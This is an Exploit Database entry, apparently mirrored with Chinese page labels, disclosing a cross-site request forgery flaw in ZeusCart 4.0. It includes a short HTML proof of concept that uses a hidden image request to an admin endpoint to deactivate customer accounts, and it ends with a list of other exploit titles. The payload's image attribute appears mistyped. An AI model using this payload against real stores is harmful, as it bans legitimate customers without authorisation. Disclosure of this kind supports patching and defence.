ZeusCart 4.0 – Cross-Site Request Forgery (Deactivate Customer Accounts)

Exploit Database
16 阅读

作者： mqt

日期： 2018-12-21
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/46027/

# Exploit Title: ZeusCart 4.0 Deactivate Customer Accounts CSRF
# Date: 12/20/2018
# Exploit Author: mqt
# Vendor Homepage: http://http://www.zeuscart.com/
# Version: Zeus Cart 4.0 CSRF

1. Vulnerability Description

Due to the form not being validated, ZeusCart4.0 suffers from a Cross
Site Request Forgery vulnerability, which means an attacker can
perform actions on behalf of a victim, by having the victim visit an
attacker controlled site.

In this case, the attacker is able to "deactivate" any customer
accounts, which means that the account is banned and cannot login.

Proof of Concept:
<html>
	<body>
		<img style="display:none"msrc="http://localhost/admin/?do=regstatus&action=deny&id=2" alt="">
	</body>
</html>

last Exploits
ZeusCart 4.0 – Cross-Site Request Forgery (Deactivate Customer Accounts)的更多信息

Nagios Network Analyzer 2.2.0 – Multiple Vulnerabilities：
Webtareas 2.0 – ‘id’ SQL Injection：
ZTE ZXDSL-931VII – Configuration Dump：
Active eCommerce CMS 6.5.0 – Stored Cross-Site Scripting (XSS)：
Open Journal Systems (OJS) 2.3.6 – Multiple Script Arbitrary File Upload：
sNews CMS 1.7.1 – Multiple Vulnerabilities：
OL-Commerce – ‘/OL-Commerce/affiliate_show_banner.php?affiliate_banner_id’ SQL Injection：
My Link Trader 1.1 – Authentication Bypass：